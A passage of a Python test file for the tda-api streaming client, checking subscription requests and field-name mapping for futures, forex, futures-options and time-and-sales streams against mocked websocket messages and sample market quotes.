'DESCRIPTION': 'MSFT May 29 2020 145 Call (Weekly)',
'BID_PRICE': 38.05,
'ASK_PRICE': 39.05,
'LAST_PRICE': 38.85,
'HIGH_PRICE': 38.85,
'LOW_PRICE': 38.85,
'CLOSE_PRICE': 38.581,
'TOTAL_VOLUME': 2,
'OPEN_INTEREST': 7,
'VOLATILITY': 5,
'QUOTE_TIME': 57599,
'TRADE_TIME': 53017,
'MONEY_INTRINSIC_VALUE': 38.51,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'EXPIRATION_YEAR': 2020,
'MULTIPLIER': 100,
'DIGITS': 2,
'OPEN_PRICE': 38.85,
'BID_SIZE': 6,
'ASK_SIZE': 116,
'LAST_SIZE': 1,
'NET_CHANGE': 0.3185,
'STRIKE_PRICE': 145,
'CONTRACT_TYPE': 'C',
'UNDERLYING': 'MSFT',
'EXPIRATION_MONTH': 5,
'TIME_VALUE': 0.34,
'EXPIRATION_DAY': 29,
'DAYS_TO_EXPIRATION': 6,
'DELTA': 1,
'GAMMA': 0,
'THETA': 0,
'VEGA': 0.1882,
'SECURITY_STATUS': 'Normal',
'THEORETICAL_OPTION_VALUE': 38.675,
'UNDERLYING_PRICE': 183.51,
'UV_EXPIRATION_TYPE': 'S',
'MARK': 38.55
}, {
'key': 'GOOG_052920C620',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0GOOG.ET00620000',
'DESCRIPTION': 'GOOG May 29 2020 620 Call (Weekly)',
'BID_PRICE': 785.2,
'ASK_PRICE': 794,
'CLOSE_PRICE': 790.42,
'VOLATILITY': 238.2373,
'QUOTE_TIME': 57594,
'TRADE_TIME': 68400,
'MONEY_INTRINSIC_VALUE': 790.42,
'QUOTE_DAY': 18404,
'EXPIRATION_YEAR': 2020,
'MULTIPLIER': 100,
'DIGITS': 2,
'BID_SIZE': 1,
'ASK_SIZE': 6,
'STRIKE_PRICE': 620,
'CONTRACT_TYPE': 'C',
'UNDERLYING': 'GOOG',
'EXPIRATION_MONTH': 5,
'TIME_VALUE': -0.82,
'EXPIRATION_DAY': 29,
'DAYS_TO_EXPIRATION': 6,
'DELTA': 0.996,
'GAMMA': 0,
'THETA': -0.3931,
'VEGA': 0.023,
'RHO': 0.1176,
'SECURITY_STATUS': 'Normal',
'THEORETICAL_OPTION_VALUE': 789.6,
'UNDERLYING_PRICE': 1410.42,
'UV_EXPIRATION_TYPE': 'S',
'MARK': 789.6
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FUTURES
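    # Level one futures (LEVELONE_FUTURES) tests: field 0 is added to the
    # request even when not explicitly listed, bad response codes raise, and
    # the handler maps numbered fields to names such as FUTURE_PERCENT_CHANGE
    # and FUTURE_EXPIRATION_DATE.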
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[
StreamClient.LevelOneFuturesFields.SYMBOL,
StreamClient.LevelOneFuturesFields.BID_PRICE,
StreamClient.LevelOneFuturesFields.ASK_PRICE,
StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES', 'SUBS'))]
await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[
StreamClient.LevelOneFuturesFields.BID_PRICE,
StreamClient.LevelOneFuturesFields.ASK_PRICE,
StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FUTURES',
'timestamp': 1590598762176,
'command': 'SUBS',
'content': [{
'key': '/ES',
'delayed': False,
'1': 2998.75,
'2': 2999,
'3': 2998.75,
'4': 15,
'5': 47,
'6': '?',
'7': '?',
'8': 1489587,
'9': 6,
'10': 1590598761934,
'11': 1590598761921,
'12': 3035,
'13': 2965.5,
'14': 2994.5,
'15': 'E',
'16': 'E-mini S&P 500 Index Futures,Jun-2020,ETH',
'17': '?',
'18': 2994,
'19': 4.25,
'20': 0.0014,
'21': 'XCME',
'22': 'Unknown',
'23': 3121588,
'24': 2999.25,
'25': 0.25,
'26': 12.5,
'27': '/ES',
'28': 'D,D',
'29': ('GLBX(de=1640;0=-1700151515301600;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 50,
'32': True,
'33': 2994.5,
'34': '/ESM20',
'35': 1592539200000
}, {
'key': '/CL',
'delayed': False,
'1': 33.33,
'2': 33.34,
'3': 33.34,
'4': 13,
'5': 3,
'6': '?',
'7': '?',
'8': 325014,
'9': 2,
'10': 1590598761786,
'11': 1590598761603,
'12': 34.32,
'13': 32.18,
'14': 34.35,
'15': 'E',
'16': 'Light Sweet Crude Oil Futures,Jul-2020,ETH',
'17': '?',
'18': 34.14,
'19': -1.01,
'20': -0.0294,
'21': 'XNYM',
'22': 'Unknown',
'23': 270931,
'24': 33.35,
'25': 0.01,
'26': 10,
'27': '/CL',
'28': 'D,D',
'29': ('GLBX(de=1640;0=-17001600;' +
'1=-17001600d-15551640;7=d-16401555)'),
'30': True,
'31': 1000,
'32': True,
'33': 34.35,
'34': '/CLN20',
'35': 1592798400000
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'LEVELONE_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_futures_handler(handler)
self.client.add_level_one_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'LEVELONE_FUTURES',
'timestamp': 1590598762176,
'command': 'SUBS',
'content': [{
'key': '/ES',
'delayed': False,
'BID_PRICE': 2998.75,
'ASK_PRICE': 2999,
'LAST_PRICE': 2998.75,
'BID_SIZE': 15,
'ASK_SIZE': 47,
'ASK_ID': '?',
'BID_ID': '?',
'TOTAL_VOLUME': 1489587,
'LAST_SIZE': 6,
'QUOTE_TIME': 1590598761934,
'TRADE_TIME': 1590598761921,
'HIGH_PRICE': 3035,
'LOW_PRICE': 2965.5,
'CLOSE_PRICE': 2994.5,
'EXCHANGE_ID': 'E',
'DESCRIPTION': 'E-mini S&P 500 Index Futures,Jun-2020,ETH',
'LAST_ID': '?',
'OPEN_PRICE': 2994,
'NET_CHANGE': 4.25,
'FUTURE_PERCENT_CHANGE': 0.0014,
'EXCHANGE_NAME': 'XCME',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 3121588,
'MARK': 2999.25,
'TICK': 0.25,
'TICK_AMOUNT': 12.5,
'PRODUCT': '/ES',
'FUTURE_PRICE_FORMAT': 'D,D',
'FUTURE_TRADING_HOURS': (
'GLBX(de=1640;0=-1700151515301600;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 50,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 2994.5,
'FUTURE_ACTIVE_SYMBOL': '/ESM20',
'FUTURE_EXPIRATION_DATE': 1592539200000
}, {
'key': '/CL',
'delayed': False,
'BID_PRICE': 33.33,
'ASK_PRICE': 33.34,
'LAST_PRICE': 33.34,
'BID_SIZE': 13,
'ASK_SIZE': 3,
'ASK_ID': '?',
'BID_ID': '?',
'TOTAL_VOLUME': 325014,
'LAST_SIZE': 2,
'QUOTE_TIME': 1590598761786,
'TRADE_TIME': 1590598761603,
'HIGH_PRICE': 34.32,
'LOW_PRICE': 32.18,
'CLOSE_PRICE': 34.35,
'EXCHANGE_ID': 'E',
'DESCRIPTION': 'Light Sweet Crude Oil Futures,Jul-2020,ETH',
'LAST_ID': '?',
'OPEN_PRICE': 34.14,
'NET_CHANGE': -1.01,
'FUTURE_PERCENT_CHANGE': -0.0294,
'EXCHANGE_NAME': 'XNYM',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 270931,
'MARK': 33.35,
'TICK': 0.01,
'TICK_AMOUNT': 10,
'PRODUCT': '/CL',
'FUTURE_PRICE_FORMAT': 'D,D',
'FUTURE_TRADING_HOURS': (
'GLBX(de=1640;0=-17001600;' +
'1=-17001600d-15551640;7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 1000,
'FUTURE_IS_ACTIVE': True,
'FUTURE_SETTLEMENT_PRICE': 34.35,
'FUTURE_ACTIVE_SYMBOL': '/CLN20',
'FUTURE_EXPIRATION_DATE': 1592798400000
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FOREX
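    # Level one forex (LEVELONE_FOREX) tests. Note that the all-fields request
    # skips field 17, matching the gap in the numbered fields used by the
    # stream item and expected handler output below.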
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,' +
'20,21,22,23,24,25,26,27,28,29')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[
StreamClient.LevelOneForexFields.SYMBOL,
StreamClient.LevelOneForexFields.HIGH_PRICE,
StreamClient.LevelOneForexFields.LOW_PRICE,
StreamClient.LevelOneForexFields.MARKET_MAKER,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': '0,10,11,26'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FOREX', 'SUBS'))]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[
StreamClient.LevelOneForexFields.HIGH_PRICE,
StreamClient.LevelOneForexFields.LOW_PRICE,
StreamClient.LevelOneForexFields.MARKET_MAKER,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FOREX',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'EUR/USD,EUR/GBP',
'fields': '0,10,11,26'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FOREX', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_forex_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FOREX',
'timestamp': 1590599267920,
'command': 'SUBS',
'content': [{
'key': 'EUR/GBP',
'delayed': False,
'assetMainType': 'FOREX',
'1': 0.8967,
'2': 0.8969,
'3': 0.8968,
'4': 1000000,
'5': 1000000,
'6': 19000000,
'7': 370000,
'8': 1590599267658,
'9': 1590599267658,
'10': 0.8994,
'11': 0.8896,
'12': 0.894,
'13': 'T',
'14': 'Euro/GBPound Spot',
'15': 0.8901,
'16': 0.0028,
'18': 'GFT',
'19': 2,
'20': 'Unknown',
'21': 'UNUSED',
'22': 'UNUSED',
'23': 'UNUSED',
'24': 'UNUSED',
'25': 'UNUSED',
'26': 'UNUSED',
'27': 0.8994,
'28': 0.8896,
'29': 0.8968
}, {
'key': 'EUR/USD',
'delayed': False,
'assetMainType': 'FOREX',
'1': 1.0976,
'2': 1.0978,
'3': 1.0977,
'4': 1000000,
'5': 2800000,
'6': 633170000,
'7': 10000,
'8': 1590599267658,
'9': 1590599267658,
'10': 1.1031,
'11': 1.0936,
'12': 1.0893,
'13': 'T',
'14': 'Euro/USDollar Spot',
'15': 1.0982,
'16': 0.0084,
'18': 'GFT',
'19': 2,
'20': 'Unknown',
'21': 'UNUSED',
'22': 'UNUSED',
'23': 'UNUSED',
'24': 'UNUSED',
'25': 'UNUSED',
'26': 'UNUSED',
'27': 1.1031,
'28': 1.0936,
'29': 1.0977
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'LEVELONE_FOREX', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_forex_handler(handler)
self.client.add_level_one_forex_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'LEVELONE_FOREX',
'timestamp': 1590599267920,
'command': 'SUBS',
'content': [{
'key': 'EUR/GBP',
'delayed': False,
'assetMainType': 'FOREX',
'BID_PRICE': 0.8967,
'ASK_PRICE': 0.8969,
'LAST_PRICE': 0.8968,
'BID_SIZE': 1000000,
'ASK_SIZE': 1000000,
'TOTAL_VOLUME': 19000000,
'LAST_SIZE': 370000,
'QUOTE_TIME': 1590599267658,
'TRADE_TIME': 1590599267658,
'HIGH_PRICE': 0.8994,
'LOW_PRICE': 0.8896,
'CLOSE_PRICE': 0.894,
'EXCHANGE_ID': 'T',
'DESCRIPTION': 'Euro/GBPound Spot',
'OPEN_PRICE': 0.8901,
'NET_CHANGE': 0.0028,
'EXCHANGE_NAME': 'GFT',
'DIGITS': 2,
'SECURITY_STATUS': 'Unknown',
'TICK': 'UNUSED',
'TICK_AMOUNT': 'UNUSED',
'PRODUCT': 'UNUSED',
'TRADING_HOURS': 'UNUSED',
'IS_TRADABLE': 'UNUSED',
'MARKET_MAKER': 'UNUSED',
'HIGH_52_WEEK': 0.8994,
'LOW_52_WEEK': 0.8896,
'MARK': 0.8968
}, {
'key': 'EUR/USD',
'delayed': False,
'assetMainType': 'FOREX',
'BID_PRICE': 1.0976,
'ASK_PRICE': 1.0978,
'LAST_PRICE': 1.0977,
'BID_SIZE': 1000000,
'ASK_SIZE': 2800000,
'TOTAL_VOLUME': 633170000,
'LAST_SIZE': 10000,
'QUOTE_TIME': 1590599267658,
'TRADE_TIME': 1590599267658,
'HIGH_PRICE': 1.1031,
'LOW_PRICE': 1.0936,
'CLOSE_PRICE': 1.0893,
'EXCHANGE_ID': 'T',
'DESCRIPTION': 'Euro/USDollar Spot',
'OPEN_PRICE': 1.0982,
'NET_CHANGE': 0.0084,
'EXCHANGE_NAME': 'GFT',
'DIGITS': 2,
'SECURITY_STATUS': 'Unknown',
'TICK': 'UNUSED',
'TICK_AMOUNT': 'UNUSED',
'PRODUCT': 'UNUSED',
'TRADING_HOURS': 'UNUSED',
'IS_TRADABLE': 'UNUSED',
'MARKET_MAKER': 'UNUSED',
'HIGH_52_WEEK': 1.1031,
'LOW_52_WEEK': 1.0936,
'MARK': 1.0977
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# LEVELONE_FUTURES_OPTIONS
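    # Level one futures options (LEVELONE_FUTURES_OPTIONS) tests. The handler
    # test below still uses synthetic messages (see the TODO) rather than
    # captured stream data.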
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_success_all_fields(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,' +
'19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_success_some_fields(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'], fields=[
StreamClient.LevelOneFuturesOptionsFields.SYMBOL,
StreamClient.LevelOneFuturesOptionsFields.BID_SIZE,
StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE,
StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': '0,4,5,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
    async def test_level_one_futures_options_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'], fields=[
StreamClient.LevelOneFuturesOptionsFields.BID_SIZE,
StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE,
StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'LEVELONE_FUTURES_OPTIONS',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'NQU20_C6500,NQU20_P6500',
'fields': '0,4,5,28'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
@no_duplicates
# TODO: Replace this with real messages
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_futures_options_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'LEVELONE_FUTURES_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'1': 2956,
'2': 2956.5,
'3': 2956.4,
'4': 3,
'5': 2,
'6': 'E',
'7': 'T',
'8': 1293,
'9': 6,
'10': 1590181200064,
'11': 1590181199726,
'12': 2956.6,
'13': 2956.3,
'14': 2956.25,
'15': '?',
'16': 'NASDAQ Call',
'17': '?',
'18': 2956.0,
'19': 0.1,
'20': 1.2,
'21': 'EXCH',
'22': 'Unknown',
'23': 19,
'24': 2955.9,
'25': 0.1,
'26': 100,
'27': 'NQU',
'28': '0.01',
'29': ('GLBX(de=1640;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 100,
'32': True,
                    '33': 17.9,
                    '34': 'NQU',
                    '35': '2020-03-01'
}, {
                    'key': 'NQU20_P6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'1': 2957,
'2': 2958.5,
'3': 2957.4,
'4': 4,
'5': 3,
'6': 'Q',
'7': 'V',
'8': 1294,
'9': 7,
'10': 1590181200065,
'11': 1590181199727,
'12': 2956.7,
'13': 2956.4,
'14': 2956.26,
'15': '?',
'16': 'NASDAQ Put',
'17': '?',
'18': 2956.1,
'19': 0.2,
'20': 1.3,
'21': 'EXCH',
'22': 'Unknown',
'23': 20,
'24': 2956.9,
'25': 0.2,
'26': 101,
'27': 'NQU',
'28': '0.02',
'29': ('GLBX(de=1641;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'30': True,
'31': 101,
'32': True,
                    '33': 17.10,
                    '34': 'NQU',
                    '35': '2021-03-01'
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(
1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_futures_options_subs(
['NQU20_C6500', 'NQU20_P6500'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_futures_options_handler(handler)
self.client.add_level_one_futures_options_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'LEVELONE_FUTURES_OPTIONS',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'NQU20_C6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'BID_PRICE': 2956,
'ASK_PRICE': 2956.5,
'LAST_PRICE': 2956.4,
'BID_SIZE': 3,
'ASK_SIZE': 2,
'ASK_ID': 'E',
'BID_ID': 'T',
'TOTAL_VOLUME': 1293,
'LAST_SIZE': 6,
'QUOTE_TIME': 1590181200064,
'TRADE_TIME': 1590181199726,
'HIGH_PRICE': 2956.6,
'LOW_PRICE': 2956.3,
'CLOSE_PRICE': 2956.25,
'EXCHANGE_ID': '?',
'DESCRIPTION': 'NASDAQ Call',
'LAST_ID': '?',
'OPEN_PRICE': 2956.0,
'NET_CHANGE': 0.1,
'FUTURE_PERCENT_CHANGE': 1.2,
'EXCHANGE_NAME': 'EXCH',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 19,
'MARK': 2955.9,
'TICK': 0.1,
'TICK_AMOUNT': 100,
'PRODUCT': 'NQU',
'FUTURE_PRICE_FORMAT': '0.01',
'FUTURE_TRADING_HOURS': ('GLBX(de=1640;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 100,
'FUTURE_IS_ACTIVE': True,
                'FUTURE_SETTLEMENT_PRICE': 17.9,
                'FUTURE_ACTIVE_SYMBOL': 'NQU',
                'FUTURE_EXPIRATION_DATE': '2020-03-01'
}, {
                'key': 'NQU20_P6500',
'delayed': False,
'assetMainType': 'FUTURES_OPTION',
'BID_PRICE': 2957,
'ASK_PRICE': 2958.5,
'LAST_PRICE': 2957.4,
'BID_SIZE': 4,
'ASK_SIZE': 3,
'ASK_ID': 'Q',
'BID_ID': 'V',
'TOTAL_VOLUME': 1294,
'LAST_SIZE': 7,
'QUOTE_TIME': 1590181200065,
'TRADE_TIME': 1590181199727,
'HIGH_PRICE': 2956.7,
'LOW_PRICE': 2956.4,
'CLOSE_PRICE': 2956.26,
'EXCHANGE_ID': '?',
'DESCRIPTION': 'NASDAQ Put',
'LAST_ID': '?',
'OPEN_PRICE': 2956.1,
'NET_CHANGE': 0.2,
'FUTURE_PERCENT_CHANGE': 1.3,
'EXCHANGE_NAME': 'EXCH',
'SECURITY_STATUS': 'Unknown',
'OPEN_INTEREST': 20,
'MARK': 2956.9,
'TICK': 0.2,
'TICK_AMOUNT': 101,
'PRODUCT': 'NQU',
'FUTURE_PRICE_FORMAT': '0.02',
'FUTURE_TRADING_HOURS': ('GLBX(de=1641;0=-1700151515301596;' +
'1=r-17001515r15301600d-15551640;' +
'7=d-16401555)'),
'FUTURE_IS_TRADEABLE': True,
'FUTURE_MULTIPLIER': 101,
'FUTURE_IS_ACTIVE': True,
                'FUTURE_SETTLEMENT_PRICE': 17.10,
                'FUTURE_ACTIVE_SYMBOL': 'NQU',
                'FUTURE_EXPIRATION_DATE': '2021-03-01'
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# TIMESALE_EQUITY
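    # TIMESALE_EQUITY tests. All three timesale streams share
    # StreamClient.TimesaleFields; coverage here includes all-fields and
    # partial-field SUBS requests, failure handling, and relabeling into
    # TRADE_TIME, LAST_PRICE, LAST_SIZE and LAST_SEQUENCE.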
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'TIMESALE_EQUITY', 'SUBS'))]
await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.TimesaleFields.SYMBOL,
StreamClient.TimesaleFields.TRADE_TIME,
StreamClient.TimesaleFields.LAST_SIZE,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'TIMESALE_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_timesale_equity_subs_success_some_fields_no_symbol(
self, ws_connect):
